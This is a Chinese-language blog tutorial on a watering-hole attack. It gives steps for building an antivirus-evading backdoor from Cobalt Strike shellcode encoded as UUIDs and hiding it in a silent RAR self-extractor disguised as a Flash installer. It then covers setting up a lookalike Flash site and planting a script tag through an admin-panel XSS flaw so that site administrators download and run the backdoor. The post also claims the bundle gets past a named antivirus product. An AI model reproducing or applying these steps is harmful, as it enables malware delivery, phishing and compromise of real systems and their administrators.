boxmoe_header_banner_img

⋅無⋅限⋅進⋅步⋅

加载中

文章导读

水抗攻击免杀后门加flash钓鱼制作


avatar
yuhui 2025年10月24日 54

水抗攻击 免杀后门 加flash钓鱼制作

1.水抗攻击

“水坑攻击”,黑客攻击方式之一,顾名思义,是在受害者必经之路设置了一个“水坑(陷阱)”。最常见的做 法是,黑客分析攻击目标的上网活动规律,寻找攻击目标经常访问的网站的弱点,先将此网站“攻破”并 植入攻击代码,一旦攻击目标访问该网站就会“中招

在渗透测试中,通常用于后台没法拿webshell,在网站找xss漏洞植入后门,当管理员访问时,弹出框 诱导管理员下载后门文件

2.制作免杀后门

使用cobalt strike 生成shellcode 再转成uuid

1746757352205-b06df678-b14e-473d-99ee-33b7530fb99d.png

1746757358225-40fb910e-7854-4954-b912-f8de6a5b9464.png

关注 uuid shellcode 可以查看学习原理 nim-lang callback uuid shellcode

https://www.jianshu.com/p/f61bbb7d6c70

1746757401185-e89469cd-4083-4983-b417-b87e9b6ca074.png

打开项目在payload.h填写 在load.cpp 加入 隐藏终端框

#pragma comment( linker, "/subsystem:"windows" /entry:"mainCRTStartup"" )

生成的uuid字符串 设置 release x64 生成即可

1746757414971-68831219-b73b-4987-ae66-d7abc55882c4.png

生成即可 免杀的方法有很多,大家自己去找

3.创建rar自解压

首先下载登录flash下载exe文件 flashcenter_install_cn.exe

1.设置好压缩名 选择创建自解压

1746757436267-97a90f95-4031-4d90-a173-4b4eac8ae224.png

2.选择高级 设置路径 C:windowstemp

1746757443366-cf02f37c-125d-43d5-97e2-27d8ac37f467.png

3.设置程序

C:windowstempflash.exe
C:windowstempflashcenter_install_cn.exe

1746757453546-8bbeb33e-c498-4b43-8360-24456798afb2.png

4.安静模式 全部隐藏

1746757463266-179c89e8-9771-46d2-9981-748e426f662c.png

5.更新方式 解压并更新文件 覆盖方式 覆盖所有文件

1746757468808-3a351316-45c3-4aca-98d8-a8a6e4381a6a.png

6.确定即可

1746757476049-48100116-2ac7-4ccb-a33a-f3945bdfaab5.png

7.修改

设置好的文件 图标还是解压的图标 使用工具替换图标

1746757484125-8fc7aebe-ccc0-4b89-add8-bb53d9cf09ea.png

设置好后

1746757489657-85b78a19-0969-4098-bee3-b701cf110e26.png

当模板执行后自动允许后门和安装程序 后门也会上线

1746757497126-b7bd9adf-79c6-4099-a7c9-dfa16a149862.png

这个方式目前可以过火绒 360另外找方法了

4.搭建FLASH钓鱼

注册一个类似flash官网的域名,把源码和后门上传到网站上

1746757512313-6776d45e-b3fe-42d0-9ab5-7ab6c130c360.png

修改源码 跳转改成后门的地址 在后台找xss 填写

<script src="域名/flash.js"></script>

5.测试

当目标访问 访问网址 或者登录后台的时候

1746757529840-5456c182-c5d8-48c9-aae8-4e8ec8d4f39f.png

1746757534086-22c66e79-90a9-4d29-8dfe-2c8cd6c499d9.png

更新: 2025-05-09 10:25:39
原文: https://www.yuque.com/yuhui.net/network/erkgmhupc65bmih5



评论(0)

查看评论列表

暂无评论


发表评论

表情 颜文字

插入代码